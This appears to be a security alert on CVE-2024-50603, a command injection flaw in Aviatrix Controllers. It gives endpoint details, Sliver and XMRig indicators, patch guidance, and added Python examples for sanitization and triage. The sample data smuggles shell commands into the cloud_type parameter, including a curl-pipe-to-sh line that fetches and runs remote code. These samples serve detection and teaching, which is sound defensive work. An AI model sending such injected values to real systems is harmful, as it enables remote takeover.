Alert essentials:
Successful attacks allow an unauthenticated user to execute arbitrary commands remotely on the controller.
Update controllers immediately and restrict public access to Aviatrix.
Detailed threat description:
Aviatrix enables enterprise organizations to deliver purpose-built infrastructure to support business-critical applications and accelerate cloud initiatives.
Due to improper neutralization of special elements used in an OS command (CWE-78), an unauthenticated, remote attacker can execute arbitrary commands on Aviatrix Controllers.
The weakness requires no user interaction, carries a CVSS score of 10.0, and is triggered by user input sent to specific API endpoints; successful exploitation grants full control of the Controller.
The root cause of the vulnerability lies in how user input is processed within the Aviatrix Controller’s API. While some parameters are properly sanitized using functions like escapeshellarg, others are passed to the shell unescaped.
Shell metacharacters sent to /v1/api in the cloud_type parameter of the list_flightpath_destination_instances action, or in the src_cloud_type parameter of the flightpath_connection_test action, reach the shell unescaped and allow execution of arbitrary commands.
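To show what the difference between a sanitized and an unsanitized parameter looks like, the following is an added Python example, not Aviatrix code (the Controller's API is PHP; shlex.quote is used here as the Python analogue of escapeshellarg). The backend command name list_instances and the two cloud_type values are constructed for illustration. The example builds the command line both ways and then tokenizes it with POSIX shell punctuation rules to show how many separate commands the shell would actually run.

```python
import shlex

# Constructed sample values for the cloud_type parameter: one benign, one carrying
# shell metacharacters (";" ends the intended command and starts another).
BENIGN_CLOUD_TYPE = "1"
HOSTILE_CLOUD_TYPE = "1; id"

# Hypothetical backend command prefix, used for illustration only.
BACKEND = "list_instances --cloud-type "


def build_vulnerable(cloud_type: str) -> str:
    """Unsanitized pattern: the parameter is interpolated into the shell string as-is."""
    return BACKEND + cloud_type


def build_hardened(cloud_type: str) -> str:
    """Sanitized pattern: shlex.quote (Python's analogue of PHP escapeshellarg)
    wraps the value in single quotes so the shell treats it as one literal word."""
    return BACKEND + shlex.quote(cloud_type)


def shell_commands(cmdline: str) -> list:
    """Tokenize cmdline with POSIX shell rules, treating ; & | as control
    operators, and return the list of separate commands the shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&", "&&", "|", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    for label, builder in (("vulnerable", build_vulnerable), ("hardened", build_hardened)):
        cmdline = builder(HOSTILE_CLOUD_TYPE)
        print(f"{label}: {cmdline!r} -> {shell_commands(cmdline)}")
```

With the unsanitized builder the hostile value yields two commands, the second being the attacker's `id`; with shlex.quote the whole value stays inside one argument and the shell never sees the `;` as an operator. The real fix is the same in PHP: every parameter that reaches a shell must go through escapeshellarg (or, better, the command should be run without a shell at all).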
A virtual machine hosting the Aviatrix Controller has a lateral-movement path to administrative cloud control-plane permissions: to perform IAM actions and function properly, the Controller is granted high IAM privileges in AWS environments by default.
This potential for lateral movement makes the Controller a prime target for threat actors aiming to move laterally and escalate their privileges in the cloud environment.
At least one proof-of-concept exploit has been published, and exploitation in the wild has been observed deploying the Sliver backdoor and the XMRig cryptocurrency miner (see the IOCs below).
However, no reports of lateral movement have surfaced as of this writing. Given active exploitation, users are recommended to apply the patches as soon as possible.
Additionally, restricting public access to the Controller significantly reduces the attack surface.
Impacts on healthcare organizations:
Access to sensitive cloud networking configurations and data allows attackers to exfiltrate confidential information, compromising organizational data integrity and privacy.
The weakness also allows an attacker to disrupt networking operations, leading to service downtime and affecting the organization’s ability to provide uninterrupted services.
Affected Products / Versions:
Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996
CVEs:
CVE-2024-50603 – CWE-78 – CVSS 10.0
| IOC | Description |
|---|---|
| 91.193.19[.]109:13333 | Sliver C2 server IP address |
| 107.172.43[.]186:3939 | Cryptocurrency mining pool IP address |
| 1ce0c293f2042b677cd55a393913ec052eded4b9 | XMRig (SHA1) |
| 68d88d1918676c87dcd39c7581c3910a9eb94882 | XMRig (SHA1) |
| c4f63a3a6cb6b8aae133bd4c5ac6f2fc9020c349 | XMRig (SHA1) |
| c63f646edfddb4232afa5618e3fac4eee1b4b115 | XMRig (SHA1) |
| e10e750115bf2ae29a8ce8f9fa14e09e66534a15 | Sliver (SHA1) |
| 41d589a077038048c4b120494719c905e71485ba | Sliver (SHA1) |
| /tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/.system_logs/momika233-2024-04-29-xmrig.zip | XMRig (path) |
| /tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/moneroocean/xmrig | XMRig (path) |
| /tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/.uid/udiskssd | XMRig (path) |
| /tmp/systemd-private-[0-9a-f]{32}-apache2.service-[0-9a-zA-Z]{6}/tmp/config | Sliver (path) |
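The following added Python example (not part of the original alert and not Aviatrix tooling) turns the endpoint details in the threat description and the IOC table above into a small triage routine: it flags API requests whose injectable parameter carries shell metacharacters, and it matches file paths and SHA1 hashes against the IOCs. The request records, file paths and hashes fed to it are constructed samples; the request shape (an action name plus a parameter map) is an assumption about how decoded /v1/api requests are represented, and the path regexes are the table's patterns with dots escaped and anchors added.

```python
import re

# Actions and the parameter each one passes to the shell unsanitized (CVE-2024-50603).
INJECTABLE_PARAMS = {
    "list_flightpath_destination_instances": "cloud_type",
    "flightpath_connection_test": "src_cloud_type",
}

# Characters that alter shell parsing when interpolated without quoting.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n]")

# Path IOCs from the table, dots escaped and anchored so whole paths must match.
_TMP = r"^/tmp/systemd-private-[0-9a-f]{32}-apache2\.service-[0-9a-zA-Z]{6}/tmp/"
IOC_PATHS = [re.compile(_TMP + tail + "$") for tail in (
    r"\.system_logs/momika233-2024-04-29-xmrig\.zip",
    r"moneroocean/xmrig",
    r"\.uid/udiskssd",
    r"config",
)]

# SHA1 IOCs from the table (XMRig and Sliver samples).
IOC_SHA1 = {
    "1ce0c293f2042b677cd55a393913ec052eded4b9",
    "68d88d1918676c87dcd39c7581c3910a9eb94882",
    "c4f63a3a6cb6b8aae133bd4c5ac6f2fc9020c349",
    "c63f646edfddb4232afa5618e3fac4eee1b4b115",
    "e10e750115bf2ae29a8ce8f9fa14e09e66534a15",
    "41d589a077038048c4b120494719c905e71485ba",
}


def flag_requests(requests):
    """Return the requests whose injectable parameter contains shell metacharacters.
    Requests for other actions, or with metacharacters in non-injectable
    parameters, are not flagged (assumed request shape: src, action, params)."""
    findings = []
    for req in requests:
        param = INJECTABLE_PARAMS.get(req["action"])
        if param is None:
            continue
        value = req["params"].get(param, "")
        if SHELL_META.search(value):
            findings.append({"src": req["src"], "action": req["action"],
                             "param": param, "value": value})
    return findings


def match_ioc_paths(paths):
    """Return the file paths that match one of the path IOCs."""
    return [p for p in paths if any(rx.match(p) for rx in IOC_PATHS)]


def match_ioc_hashes(sha1s):
    """Return the subset of the given SHA1 digests that are known IOCs."""
    return {h.lower() for h in sha1s} & IOC_SHA1


# Constructed sample input (not real telemetry). 203.0.113.0/24 is documentation space.
SAMPLE_REQUESTS = [
    {"src": "10.0.1.5", "action": "list_flightpath_destination_instances",
     "params": {"cloud_type": "1"}},
    {"src": "203.0.113.7", "action": "list_flightpath_destination_instances",
     "params": {"cloud_type": "1;curl -s http://203.0.113.7/x|sh"}},
    {"src": "203.0.113.7", "action": "flightpath_connection_test",
     "params": {"src_cloud_type": "1`id`", "dst_cloud_type": "1"}},
    {"src": "10.0.1.5", "action": "login", "params": {"username": "admin;"}},
]
SAMPLE_PATHS = [
    "/tmp/systemd-private-0123456789abcdef0123456789abcdef-apache2.service-Ab12Cd/tmp/config",
    "/tmp/systemd-private-0123456789abcdef0123456789abcdef-apache2.service-Ab12Cd/tmp/moneroocean/xmrig",
    "/var/log/apache2/access.log",
]
SAMPLE_SHA1S = ["e10e750115bf2ae29a8ce8f9fa14e09e66534a15",
                "da39a3ee5e6b4b0d3255bfef95601890afd80709"]

if __name__ == "__main__":
    for f in flag_requests(SAMPLE_REQUESTS):
        print("suspicious request:", f)
    print("IOC paths:", match_ioc_paths(SAMPLE_PATHS))
    print("IOC hashes:", match_ioc_hashes(SAMPLE_SHA1S))
```

Run against real data, feed flag_requests the decoded request parameters (the Controller's API accepts them as a form body, so a plain access log will not show them), and walk /tmp on the Controller for match_ioc_paths. A hit on the path or hash IOCs means the host is already compromised and should be treated as a forensic artifact rather than simply patched.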
Recommendations:
Engineering recommendations:
- Back up the Aviatrix Controller
  - Controller backup and restore can be performed directly from the Controller UI
- Install the Critical Vulnerability Security Patch for CVE-2024-50603, or update the Controller to 7.1.4191 or 7.2.4996
- Validate the update with the Patch Status
  - In certain circumstances the patch is not fully persistent across controller upgrades and must be re-applied even if the Controller status is displayed as “Patched”. These circumstances are:
    - The patch was first applied to a version prior to 7.1.4191 or 7.2.4996
    - The Controller is subsequently updated to a version prior to 7.1.4191 or 7.2.4996
    - The Controller does not have an associated CoPilot running version 4.16.1 or higher
- Back up the Aviatrix Controller again with the new configuration
  - Since the Controller stores configuration data, it should be backed up periodically to the appropriate AWS/Azure/Google account
- Conduct forensic investigations on affected Controllers (see the IOCs above)
- Search for lateral movement attempts in the cloud control plane, in particular API calls made with the Controller’s IAM role
Leadership / Program recommendations:
- When the Controller is down or out of service, the network will continue to be operational, and encrypted tunnels and OpenVPN® users will stay connected and unaffected
- Since most of the data logs are forwarded from the gateways directly, the loss of log information from the Controller is minimal during downtime
- Customers are strongly recommended to perform image migration twice a year
- Aviatrix publishes Field Notices and sends alerts to the Controller Admin in the Controller console when security-related issues are published
Fortified recommends applying patches and updates where possible and only after adequate testing in a development environment to ensure stability and compliance with organizational change management policies.
References:
- Aviatrix advisory: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- Aviatrix Backup and Restore: https://docs.aviatrix.com/documentation/latest/platform-administration/controller/controller-backup-restore.html
- Aviatrix permissions: https://docs.aviatrix.com/documentation/latest/platform-administration/accounts-and-users/iam-role.html#what-permissions-are-required-in-app-role-policy-and-why
- Aviatrix security patches: https://docs.aviatrix.com/documentation/latest/release-notices/security-patches/security-patches.html
- Proof-of-Concept: https://github.com/th3gokul/CVE-2024-50603
- Sliver backdoor: https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver